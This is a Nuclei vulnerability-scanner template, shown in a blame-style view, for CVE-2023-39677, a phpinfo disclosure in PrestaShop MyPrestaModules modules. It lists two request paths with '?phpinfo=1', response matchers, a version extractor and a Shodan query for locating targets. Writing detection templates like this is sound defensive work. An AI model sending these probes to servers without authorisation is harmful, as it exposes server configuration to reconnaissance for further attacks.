2023-09-08 11:30:28 +00:00
|
|
|
id: CVE-2023-39677
|
2023-09-11 06:57:02 +00:00
|
|
|
|
2023-09-08 11:30:28 +00:00
|
|
|
info:
|
2023-09-15 16:54:13 +00:00
|
|
|
name: PrestaShop MyPrestaModules - PhpInfo Disclosure
|
2023-09-08 11:30:28 +00:00
|
|
|
author: meme-lord
|
2023-10-14 11:27:55 +00:00
|
|
|
severity: high
|
2023-09-15 16:54:13 +00:00
|
|
|
description: |
|
|
|
|
PrestaShop modules by MyPrestaModules expose PHPInfo
|
2023-09-27 15:51:13 +00:00
|
|
|
impact: |
|
|
|
|
An attacker can exploit this vulnerability to obtain sensitive information about the server configuration, potentially leading to further attacks.
|
2023-09-08 11:30:28 +00:00
|
|
|
reference:
|
|
|
|
- https://blog.sorcery.ie/posts/myprestamodules_phpinfo/
|
2023-09-15 16:54:13 +00:00
|
|
|
- https://cve.report/CVE-2023-39677
|
2023-10-14 11:27:55 +00:00
|
|
|
- https://myprestamodules.com/
|
|
|
|
- https://sorcery.ie
|
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
|
|
cvss-score: 7.5
|
|
|
|
cve-id: CVE-2023-39677
|
|
|
|
epss-score: 0.00632
|
2023-12-12 11:07:52 +00:00
|
|
|
epss-percentile: 0.76689
|
2023-10-14 11:27:55 +00:00
|
|
|
cpe: cpe:2.3:a:simpleimportproduct_project:simpleimportproduct:6.2.9:*:*:*:*:prestashop:*:*
|
2023-09-11 06:57:02 +00:00
|
|
|
metadata:
|
2023-09-27 15:51:13 +00:00
|
|
|
verified: true
|
2023-09-15 17:04:28 +00:00
|
|
|
max-request: 2
|
2023-10-14 11:27:55 +00:00
|
|
|
vendor: simpleimportproduct_project
|
|
|
|
product: simpleimportproduct
|
|
|
|
framework: prestashop
|
2023-09-11 06:57:02 +00:00
|
|
|
shodan-query: http.component:"PrestaShop"
|
2023-12-05 09:50:33 +00:00
|
|
|
tags: cve,cve2023,prestashop,phpinfo,disclosure,simpleimportproduct_project
|
2023-09-08 11:30:28 +00:00
|
|
|
|
|
|
|
http:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/modules/simpleimportproduct/send.php?phpinfo=1"
|
|
|
|
- "{{BaseURL}}/modules/updateproducts/send.php?phpinfo=1"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- "PHP Extension"
|
|
|
|
- "PHP Version"
|
|
|
|
condition: and
|
|
|
|
|
2023-09-11 06:57:02 +00:00
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
|
|
|
|
2023-09-08 11:30:28 +00:00
|
|
|
extractors:
|
|
|
|
- type: regex
|
|
|
|
part: body
|
|
|
|
group: 1
|
|
|
|
regex:
|
|
|
|
- '>PHP Version <\/td><td class="v">([0-9.]+)'
|
2023-12-29 09:30:44 +00:00
|
|
|
# digest: 490a004630440220349c2def06ea877aca2978268801938a32152c435b2cd0d7c0fb71eb5408521e0220440d5db806f8f7402ec4cb6e51d95fbea385a0af6c9e439add33f1be3d54fcc0:922c64590222798bb761d5b6d8e72950
|